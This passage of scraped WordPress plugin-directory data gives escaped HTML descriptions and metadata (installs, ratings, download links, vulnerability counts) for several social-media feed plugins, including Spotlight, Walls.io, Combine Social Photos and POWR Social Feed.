Instagram to your website (think Linktree or Lnk.bio)\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Fshoppable-instagram-feed-wordpress\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_upgradeshoppable\" rel=\"nofollow ugc\">\u003Cstrong>Shoppable Instagram feeds\u003C\u002Fstrong>\u003C\u002Fa> to increase eCommerce sales through your social media content\u003Cbr \u002F>\n– WooCommerce integration (link posts to products)\u003C\u002Fp>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Fpricing\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_all_access\" rel=\"nofollow ugc\">Spotlight Agency\u003C\u002Fa>\u003C\u002Fstrong>\u003Cbr \u002F>\n– Everything in Free, Essentials, and PRO plus…\u003Cbr \u002F>\n– Instagram account \u003Cstrong>insights\u003C\u002Fstrong>\u003Cbr \u002F>\n– Instagram post insights\u003Cbr \u002F>\n– Feed engagement \u003Cstrong>analytics\u003C\u002Fstrong>\u003Cbr \u002F>\n– Feed promotion analytics\u003Cbr \u002F>\n– Google analytics integration\u003Cbr \u002F>\n– \u003Cstrong>Media management\u003C\u002Fstrong> to control image and video quality and storage\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Fdemo\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_upgradedemo\" rel=\"nofollow ugc\">\u003Cstrong>Premium Instagram Demos\u003C\u002Fstrong>\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>User Reviews and Testimonials\u003C\u002Fh3>\n\u003Cp>Spotlight helps tens of thousands of website owners display Instagram feeds. Here are a few testimonials from our 100+ reviews.\u003C\u002Fp>\n\u003Cp>Taken directly from the WordPress Plugin Repository…\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Finally, a social plugin that simply works\u003C\u002Fstrong>\u003Cbr \u002F>\n“This plugin is easy to install and I had no issues linking to my client’s Instagram feed. […] It is my new go-to. I am so happy I can finally say my hunt is over for the perfect social feeds plugin.” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Ffinally-a-social-plugin-that-simply-works\u002F\" rel=\"ugc\">@georgiag\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>My new go-to for Instagram feeds\u003C\u002Fstrong>\u003Cbr \u002F>\n“This plugin has a slick back-end to get you connected, whilst the front end works perfectly on the page – it’s snappy and fits with your theme. The key feature for me was the image lightbox popup, so your site visitor remains on the page and doesn’t jump over to Instagram to get distracted! I’m pleased to report that this feature works perfectly in the free version. Oh, and support replies and fixes within several hours!” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fmy-new-go-to-for-instagram-feeds-5%e2%ad%90\u002F\" rel=\"ugc\">@photomaldives\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Perfect and easy to use\u003C\u002Fstrong>\u003Cbr \u002F>\n“Was looking for an IG gallery plugin and this one did not disappoint. The free version offers a good amount of features and the premium one is solid as well, providing more customization. Support is top-notch and quick to respond.” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fperfect-and-easy-to-use-22\u002F\" rel=\"ugc\">@littleeasy\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Great plugin, easy to customize\u003C\u002Fstrong>\u003Cbr \u002F>\n“I have been using this plugin for a few months, and I’m really happy with it. I like that it’s easy to customize and looks really great both on a computer screen and on a mobile phone’s screen.” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fgreat-plugin-easy-to-customize-7\u002F\" rel=\"ugc\">@misselenat\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Recommended by the experts\u003C\u002Fh3>\n\u003Cp>The following are media highlights of Spotlight Instagram Feeds across various well-respected publications.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Hubspot: \u003Ca href=\"https:\u002F\u002Fblog.hubspot.com\u002Fwebsite\u002Ftop-free-instagram-plugins-wordpress-site\" rel=\"nofollow ugc\">Top 3 Free Instagram Plugins for WordPress\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Elementor: \u003Ca href=\"https:\u002F\u002Felementor.com\u002Fblog\u002Fbest-instagram-plugins-wordpress\u002F\" rel=\"nofollow ugc\">Best Instagram Plugins for WordPress\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Kinsta: \u003Ca href=\"https:\u002F\u002Fkinsta.com\u002Fblog\u002Fwordpress-instagram-plugin\u002F\" rel=\"nofollow ugc\">WordPress Instagram Plugins\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>BobWP: \u003Ca href=\"https:\u002F\u002Fbobwp.com\u002Fhow-to-improve-woocommerce-sales-using-your-instagram-feed\u002F\" rel=\"nofollow ugc\">How to Improve WooCommerce Sales Using Instagram\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Avada: \u003Ca href=\"https:\u002F\u002Ftheme-fusion.com\u002Fhow-to-use-instagram-feeds-to-boost-traffic-and-conversions\u002F\" rel=\"nofollow ugc\">Use Instagram Feeds to Boost Traffic and Conversions\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Elegant Themes: \u003Ca href=\"https:\u002F\u002Fwww.elegantthemes.com\u002Fblog\u002Fwordpress\u002Finstagram-plugins-for-sharing-your-feed\" rel=\"nofollow ugc\">7 Great Instagram Plugins for Sharing Your Feed\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>aThemes: \u003Ca href=\"https:\u002F\u002Fathemes.com\u002Fcollections\u002Fbest-wordpress-instagram-plugins\u002F\" rel=\"nofollow ugc\">Best WordPress Instagram Plugins 2020\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>WPExplorer: \u003Ca href=\"https:\u002F\u002Fwww.wpexplorer.com\u002Fadd-instagram-wordpress\u002F\" rel=\"nofollow ugc\">How to Add Instagram Photos to WordPress\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>WP Mayor: \u003Ca href=\"https:\u002F\u002Fwpmayor.com\u002Fimport-instagram-photos-wordpress\u002F\" rel=\"nofollow ugc\">How to Import Instagram Photos to WordPress\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Disclaimer\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Spotlight Instagram Feeds, also known as Spotlight Social Media Feeds or SpotlightWP, is a RebelCode product officially verified by Facebook to make use of the official Instagram(tm) API. It is not affiliated with or endorsed by Instagram and\u002For Facebook.\u003C\u002Fp>\n","Instagram feeds made easy. Responsive, customizable, accessible, and SEO-friendly out of the box. Includes Instagram blocks & oEmbed support.",60000,1546178,94,169,"2026-03-10T09:26:00.000Z","5.7",[92,93,94,20,95],"instagram","instagram-block","instagram-embed","instagram-widget","https:\u002F\u002Fspotlightwp.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fspotlight-social-photo-feeds.1.7.5.zip","2025-02-14 00:00:00",{"slug":100,"name":101,"version":102,"author":100,"author_profile":103,"description":104,"short_description":105,"active_installs":106,"downloaded":107,"rating":108,"num_ratings":109,"last_updated":110,"tested_up_to":15,"requires_at_least":24,"requires_php":24,"tags":111,"homepage":115,"download_link":116,"security_score":117,"vuln_count":13,"unpatched_count":13,"last_vuln_date":37,"fetched_at":29},"wallsio","Walls.io: Social Media Feed","3.0.14","https:\u002F\u002Fprofiles.wordpress.org\u002Fwallsio\u002F","\u003Cp>Are you looking for a social wall solution to showcase posts from various social platforms right on your website?\u003C\u002Fp>\n\u003Cp>With Walls.io you can collect posts, photos and videos from \u003Ca href=\"https:\u002F\u002Fwalls.io\u002Ffeatures\u002Fsocial-media-aggregator\" rel=\"nofollow ugc\">multiple social media networks\u003C\u002Fa> in one place and display them in a customizable social media feed that you can easily embed into your website. Unlike other social walls, Walls.io goes beyond social media also giving you the possibility to let visitors upload content directly to the wall using \u003Ca href=\"https:\u002F\u002Fwalls.io\u002Ffeatures\u002Fdirect-posts\" rel=\"nofollow ugc\">Direct Posts\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>To use this plugin you first need to get a social wall account on \u003Ca href=\"https:\u002F\u002Fwalls.io\" rel=\"nofollow ugc\">walls.io\u003C\u002Fa>, where you can create and customize a social media feed and add sources to it.\u003C\u002Fp>\n\u003Cp>The Walls.io WordPress plugin makes it very easy for you to add your social media feed to WordPress. No programming skills are needed. It only takes a minute.\u003C\u002Fp>\n\u003Ch4>Walls.io Social Wall\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Go to \u003Ca href=\"https:\u002F\u002Fwalls.io\" rel=\"nofollow ugc\">walls.io\u003C\u002Fa>, start a trial, add sources, customize the design and set up post moderation.\u003C\u002Fli>\n\u003Cli>Go and grab the link to your wall by clicking on its URL in the upper left corner of the Settings page.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Embed on a page or a post\u003C\u002Fh4>\n\u003Cp>Add your Walls.io social media feed on any post or page using the WordPress Gutenberg editor. Simply create a new block, search for “walls”, select the Walls.io plugin, enter your wall’s URL and click “Embed”.\u003C\u002Fp>\n\u003Cp>If you’re still using the old WordPress editor, go into edit mode and click the “Add a Walls.io Wall” button at the top of the editor. A new window will open where you can add your Walls.io social wall URL.\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002F_JexDQ0XdBM?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Ch4>Support\u003C\u002Fh4>\n\u003Cp>If you have any questions or suggestions, please don’t hesitate to contact us at \u003Ca href=\"mailto:support@walls.io\" rel=\"nofollow ugc\">support@walls.io\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Cp>Walls.io puts all your social media feeds in one place, allows you to moderate the content, design the feed so that it matches your brand’s website, and even post custom content. Here are the main features of the Walls.io social media feed:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>It collects social content from multiple social platforms: Facebook, Twitter, Instagram, YouTube, TikTok, Pinterest, Linkedin, ВКонтакте (VKontakte), Flickr, Tumblr, Reddit, Vimeo, \u003Ca href=\"https:\u002F\u002Fwalls.io\u002Fsources\" rel=\"nofollow ugc\">and others\u003C\u002Fa>.\u003C\u002Fli>\n\u003Cli>It allows your community to directly publish image and text posts to your wall without having to use any social media platform. The \u003Ca href=\"https:\u002F\u002Fwalls.io\u002Ffeatures\u002Fdirect-posts\" rel=\"nofollow ugc\">Direct Posts\u003C\u002Fa> feature is your way of inviting absolutely anyone to interact with your social wall and upload exclusive user-generated content.\u003C\u002Fli>\n\u003Cli>It’s easy to customize in terms of design: you can choose from different themes and further customize backgrounds, fonts, tile colors and even use CSS for even more amazing design tweaks.\u003C\u002Fli>\n\u003Cli>It has a powerful spam detection algorithm behind it, and filters spam based on text analysis as well as image-based NSFW detection, which helps keep spammy posts away from your social feed.\u003C\u002Fli>\n\u003Cli>It offers advanced moderation options including language filters and blacklist filters for both keywords and profiles.\u003C\u002Fli>\n\u003Cli>It allows you to add your own content to the mix (not only social media posts): custom content can contain details about your next event, information about your latest product, posts promoting a great product feature, interesting facts about your company, testimonials from your clients or employees – you name it!\u003C\u002Fli>\n\u003Cli>The social feed is completely responsive and mobile-ready. A social feed looks great on any screen size and in any container width.\u003C\u002Fli>\n\u003C\u002Ful>\n","Embed Walls.io social walls into WordPress posts with just one click!",1000,33959,76,6,"2025-12-09T10:32:00.000Z",[20,112,113,114,23],"social-media-aggregator","social-media-embed","social-media-feed","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwallsio","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwallsio.zip",100,{"slug":119,"name":120,"version":121,"author":122,"author_profile":123,"description":124,"short_description":125,"active_installs":126,"downloaded":127,"rating":117,"num_ratings":128,"last_updated":129,"tested_up_to":130,"requires_at_least":131,"requires_php":132,"tags":133,"homepage":24,"download_link":135,"security_score":117,"vuln_count":13,"unpatched_count":13,"last_vuln_date":37,"fetched_at":29},"still-be-combine-social-photos","Combine Social Photos | Still BE","0.20.2","Daisuke Yamamoto","https:\u002F\u002Fprofiles.wordpress.org\u002Fanalogstudio\u002F","\u003Cp>Add blocks where you can embed instagram feed. Provides embedding optimized for Block Editor.\u003Cbr \u002F>\nMultiple accounts can be managed at a site.\u003C\u002Fp>\n\u003Cp>You can be done \u003Cstrong>on the block editor for all visual editing\u003C\u002Fstrong>, making it possible to achieve the desired layout \u003Cstrong>more comfortably, flexibility and speedy\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Cp>You can embed your own feeds, other Pro accounts’ feeds and posts related to hashtags.\u003C\u002Fp>\n\u003Cp>Getting feeds from other Pro accounts (Business Discovery) or posts related to hashtags requires authentication with the Instagram Graph API.\u003C\u002Fp>\n\u003Cp>Data got from Instagram is cached for faster display.\u003Cbr \u002F>\nWhen the cache expires, it is automatically got data in the background and updated when the reacquisition is complete. This ensures that a valid cache is always available.\u003C\u002Fp>\n\u003Ch3>Blocks ; Common Options\u003C\u002Fh3>\n\u003Cp>All blocks have the following options.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Advanced Getting Posts\n\u003Cul>\n\u003Cli>Type of Getting Posts\u003C\u002Fli>\n\u003Cli>Other User’s Username\u003C\u002Fli>\n\u003Cli>Hashtag\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Video Option\n\u003Cul>\n\u003Cli>Displaying Video\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Instagram Post Where to Open\u003C\u002Fli>\n\u003Cli>Post Caption\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003Cli>Lines\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Post Author\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Post Time\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Hover Effect\n\u003Cul>\n\u003Cli>Frosted Glass Effect\u003C\u002Fli>\n\u003Cli>Tilt Effect\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Footer\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003Cli>Position (Left \u002F Center \u002F Right)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Like \u002F Comments Count\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003Cli>Position (hover on image \u002F below the image)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Block; Simple Grid\u003C\u002Fh3>\n\u003Cp>A block of posts placed on a grid.\u003Cbr \u002F>\nThe following customizations are available.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Outline Gap (PC \u002F Tablet \u002F SP)\u003C\u002Fli>\n\u003Cli>Layout (PC \u002F Tablet \u002F SP)\n\u003Cul>\n\u003Cli>Columns\u003C\u002Fli>\n\u003Cli>Rows\u003C\u002Fli>\n\u003Cli>Aspect Ratio\u003C\u002Fli>\n\u003Cli>Gap\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Highlight\n\u003Cul>\n\u003Cli>Size\u003C\u002Fli>\n\u003Cli>Position (Left \u002F Top)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Header\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003Cli>Position (Left \u002F Center \u002F Right)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Follows Count\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Followers Count\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Block; Simple Slider\u003C\u002Fh3>\n\u003Cp>A block can slide horizontally.\u003Cbr \u002F>\nThe following customizations are available.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Layout\n\u003Cul>\n\u003Cli>Base Width\u003C\u002Fli>\n\u003Cli>Min Width\u003C\u002Fli>\n\u003Cli>Min Columns\u003C\u002Fli>\n\u003Cli>Columns\u003C\u002Fli>\n\u003Cli>Rows\u003C\u002Fli>\n\u003Cli>Aspect Ratio\u003C\u002Fli>\n\u003Cli>Gap (between columns \u002F rows)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Scrolling\n\u003Cul>\n\u003Cli>Duration Time\u003C\u002Fli>\n\u003Cli>Easing Function (Linear \u002F InOutSine \u002F InOutQuad \u002F InOutCubic \u002F OutBounce \u002F Cubic-bezier)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Exclude Navigation Buttons\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Block; Masonry Grid (Beta)\u003C\u002Fh3>\n\u003Cp>A block of posts placed on a masonry layout.\u003Cbr \u002F>\nThe following customizations are available.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Outline Gap (PC \u002F Tablet \u002F SP)\u003C\u002Fli>\n\u003Cli>Layout\n\u003Cul>\n\u003Cli>Media Count\u003C\u002Fli>\n\u003Cli>Column Max Width\u003C\u002Fli>\n\u003Cli>Gap\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Loading Effect\u003C\u002Fli>\n\u003Cli>Header\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003Cli>Position (Left \u002F Center \u002F Right)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Follows Count\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Followers Count\n\u003Cul>\n\u003Cli>Show \u002F Hidden\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Modal Window\u003C\u002Fh3>\n\u003Cp>Selecting a modal window allows user to view the details of Instagram posts without leaving your website.\u003Cbr \u002F>\nYou can also put a CTA (Call to Action) within the modal window.\u003C\u002Fp>\n\u003Ch3>Link with Instagram Account\u003C\u002Fh3>\n\u003Cp>Easily link to your Instagram accounts.\u003Cbr \u002F>\nMultiple accounts can be managed, and the account to be used can be selected individually when put a block.\u003C\u002Fp>\n\u003Ch3>3rd party resources\u003C\u002Fh3>\n\u003Ch4>Font Awesome\u003C\u002Fh4>\n\u003Cp>WebSite: https:\u002F\u002Ffontawesome.com\u002F\u003Cbr \u002F>\nLicense: https:\u002F\u002Ffontawesome.com\u002Flicense\u002Ffree\u003C\u002Fp>\n","Provides Instagram embedding functionality exclusively for WP Block Editor. Your feeds, other Pro accounts' feeds and posts related to hashtags.",700,12248,2,"2026-04-06T07:36:00.000Z","7.0","6.7","8.0",[19,92,20,134],"instagram-photos","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fstill-be-combine-social-photos.0.20.2.zip",{"slug":137,"name":138,"version":139,"author":140,"author_profile":141,"description":142,"short_description":143,"active_installs":144,"downloaded":145,"rating":146,"num_ratings":147,"last_updated":148,"tested_up_to":149,"requires_at_least":131,"requires_php":150,"tags":151,"homepage":154,"download_link":155,"security_score":156,"vuln_count":13,"unpatched_count":13,"last_vuln_date":37,"fetched_at":29},"powr-social-feed","Social Media Feed for WordPress","2.1.0","POWR","https:\u002F\u002Fprofiles.wordpress.org\u002Fpowr\u002F","\u003Cp>\u003Cstrong>Boost social engagement and grow your brand on Instagram, Facebook, TikTok and YouTube with Social Media Feed by POWR\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Easily display your social media content on your website to increase time on site, enhance brand recognition, and grow your following.\u003C\u002Fp>\n\u003Cp>Connect and showcase content from Instagram, Reels, TikTok, Facebook, Pinterest, YouTube, Vimeo, and more, all in one dynamic feed.\u003C\u002Fp>\n\u003Cp>With automatic social media updates, your feed will always stay fresh and relevant.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>15+ million POWR plugin users worldwide can’t be wrong!\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>🛠️ Embed Social Feed in 4 Simple Steps\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Connect your social media source\u003C\u002Fli>\n\u003Cli>Modify your content, choose content refresh rate, post approvals, etc.\u003C\u002Fli>\n\u003Cli>Fully customize your layout, size, background, hover effects, and more\u003C\u002Fli>\n\u003Cli>Publish!\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>✨ Social Feed Plugin Feature Highlights\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Connect to Instagram, Facebook, TikTok, Pinterest, YouTube, Vimeo, or even RSS\u003C\u002Fli>\n\u003Cli>Display images, photos, videos, and text in one responsive gallery\u003C\u002Fli>\n\u003Cli>Follow @handles, #hashtags, account, or site URLs.\u003C\u002Fli>\n\u003Cli>Adjust the width, height, columns, size, background color, spacing and more\u003C\u002Fli>\n\u003Cli>Customize your feed layout, header style, post settings, lightbox, and much more\u003C\u002Fli>\n\u003Cli>Approve posts before they go live on your site\u003C\u002Fli>\n\u003Cli>Keep your content up-to-date with automatic feed updates\u003C\u002Fli>\n\u003Cli>Mobile responsive on any device\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>POWR Social Feed has all you need for free, but there are many other features available on upgrade like:\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Connect up to 15 social channels all in one feed\u003C\u002Fli>\n\u003Cli>Up to 50 posts per feed\u003C\u002Fli>\n\u003Cli>Content auto-refresh every 20 minutes\u003C\u002Fli>\n\u003Cli>Unlimited access to 60+ plugins like contact form, popup, countdown timer, image slider, and more for one \u003Ca href=\"https:\u002F\u002Fwww.powr.io\u002Fbusiness\" rel=\"nofollow ugc\">deeply discounted price\u003C\u002Fa>. Over $900\u002Fyr in savings!\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🥇 Popular Social Feed Types on WordPress Websites\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Instagram Feed:\u003C\u002Fstrong> Display your latest Instagram posts to keep content fresh and engaging\u003Cbr \u002F>\n\u003Cstrong>Facebook Feed:\u003C\u002Fstrong> Embed your Facebook page posts, allowing visitors to see updates without leaving\u003Cbr \u002F>\n\u003Cstrong>TikTok Feed:\u003C\u002Fstrong> Show TikTok videos to highlight trending content or user-generated media\u003Cbr \u002F>\n\u003Cstrong>Pinterest Feed:\u003C\u002Fstrong> Integrate your Pinterest boards or pins, making it easy to share visual inspiration\u003Cbr \u002F>\n\u003Cstrong>YouTube Feed:\u003C\u002Fstrong> Stream videos from a YouTube channel or playlist for easy video content integration\u003Cbr \u002F>\n\u003Cstrong>Vimeo Feed:\u003C\u002Fstrong> Embed Vimeo videos in a dynamic feed to showcase high-quality video content\u003Cbr \u002F>\n\u003Cstrong>RSS Feed:\u003C\u002Fstrong> Pull in content from an RSS feed to automatically update your website with the latest articles or news\u003Cbr \u002F>\n\u003Cstrong>Tumblr Feed:\u003C\u002Fstrong> Display Tumblr blog posts, keeping content fresh and connected\u003Cbr \u002F>\n\u003Cstrong>Flickr Feed:\u003C\u002Fstrong> Showcase Flickr photo albums or galleries to highlight visual storytelling\u003C\u002Fp>\n\u003Ch3>💙 Why WordPress Users Love POWR Social Feed\u003C\u002Fh3>\n\u003Cblockquote>\n\u003Cp>\u003Cem>“Don’t even consider anything else. Not only is the product outstanding, heads & shoulders above anything else but the support is SUPERB. Use >this app. I reiterate, don’t even THINK about anything else. This is the best Social Feed with outstanding support!”\u003C\u002Fem> – \u003Cstrong>paralegalsperdiemh\u003C\u002Fstrong>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin connects to \u003Ca href=\"https:\u002F\u002Fwww.powr.io\u002F\" rel=\"nofollow ugc\">POWR.io\u003C\u002Fa> to enable its functionality and transmits the user’s email address for authentication purposes.\u003C\u002Fp>\n\u003Cp>It sends the user’s email every time the widget is loaded.\u003Cbr \u002F>\nThis service is provided by “POWR”: \u003Ca href=\"https:\u002F\u002Fwww.powr.io\u002Fterms\" rel=\"nofollow ugc\">Terms of Use\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwww.powr.io\u002Fprivacy\" rel=\"nofollow ugc\">Privacy Policy\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>✅ Not just great social feed plugins — Over 60 No-Code WordPress Plugins Available\u003C\u002Fh3>\n\u003Cp>With a complete library at your fingertips, here are our WordPress users’ favorites:\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fpowr-popup\u002F\" rel=\"ugc\">Popup\u003C\u002Fa>: Increase conversions with a pop-up sign-up form, or create a special promotion popup with a coupon code and keep visitors on your site with an exit intent popup. Integrates with Mailchimp and Zapier to make managing contacts a breeze.\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fpowr-pack\u002F\" rel=\"ugc\">Form Builder\u003C\u002Fa>: Allows you to create fully customizable forms without coding. It features advanced elements like conditional logic, multi-page forms, and file uploads. The tool also supports payment collection, integrations, and automated responses, making it ideal for lead generation, customer feedback, and e-commerce transactions.\u003C\u002Fp>\n\u003Cp>Photo + Video Gallery: Easily create and customize image and video galleries for your website, enhancing visual appeal and engagement. Features include responsive design, hover effects, and social sharing to showcase products, portfolios, or events.\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fpowr-multi-slider\" rel=\"ugc\">Image Slider\u003C\u002Fa>: Increase visitor trust with a slideshow of photos, videos, or customer testimonials. Add images, videos, events, and promotional banners with call-to-action buttons to create a beautiful slideshow for your WordPress site. Choose from different transition styles and automatically repeat slides to keep visitors engaged and active.\u003C\u002Fp>\n\u003Cp>PayPal Button: Collect payments quickly and securely on your WordPress site. Accept one-time payments, set up subscriptions, or collect donations. Customize the button text, receive email notifications when a payment is made, and design your autoresponder email to ensure successful payments.\u003C\u002Fp>\n\u003Cp>You can also get \u003Cstrong>unlimited access to 60+ plugins\u003C\u002Fstrong> like contact form, popup, countdown timer, image slider, and more for one \u003Ca href=\"https:\u002F\u002Fwww.powr.io\u002Fbusiness\" rel=\"nofollow ugc\">deeply discounted price\u003C\u002Fa>. Over $900\u002Fyr in savings!\u003C\u002Fp>\n\u003Ch3>📚 Article Library\u003C\u002Fh3>\n\u003Cp>The \u003Ca href=\"https:\u002F\u002Fblog.powr.io\u002F\" rel=\"nofollow ugc\">POWR Blog\u003C\u002Fa> is a library of over 1,000 articles from more than 300 authors worldwide. Learn more about how to grow your business with topics like: lead generation, digital marketing, website optimization, social media, small business, and customer loyalty.\u003C\u002Fp>\n\u003Ch3>👩🏻‍🔧 FAST AND FREE CUSTOMER SUPPORT\u003C\u002Fh3>\n\u003Cp>If you have any questions or need help getting up and running, we’re here to help! POWR offers free support, and our awesome support team is available 24 hours a day. You can also visit our \u003Ca href=\"https:\u002F\u002Fhelp.powr.io\u002Fhc\u002Fen-us\u002Fsections\u002F115000675448-Social-Feed\" rel=\"nofollow ugc\">Help Center\u003C\u002Fa> for tips, support, and answers to common questions.\u003C\u002Fp>\n\u003Cp>You can also join the \u003Ca href=\"https:\u002F\u002Fcommunity.powr.io\u002F\" rel=\"nofollow ugc\">POWR Community\u003C\u002Fa> for free! Talk directly to the developers, support team, and marketing, or make direct feature requests.\u003C\u002Fp>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin connects to the POWR.io API to provide plugin functionality. The connection is necessary to authenticate and display the plugin content within your WordPress site.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Service\u003C\u002Fstrong>: POWR.io API\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Purpose\u003C\u002Fstrong>: To authenticate and render the plugin widget on your WordPress site.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Data Sent\u003C\u002Fstrong>: The plugin sends the current user’s email address, web site url, ip, and the username to the POWR.io API for authentication purposes.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>When\u003C\u002Fstrong>: This data is sent when the admin settings page is accessed or when the shortcode is used to display the plugin.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Service Provider\u003C\u002Fstrong>: POWR.io\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.powr.io\u002Fterms\" rel=\"nofollow ugc\">Terms of Service\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.powr.io\u002Fprivacy\" 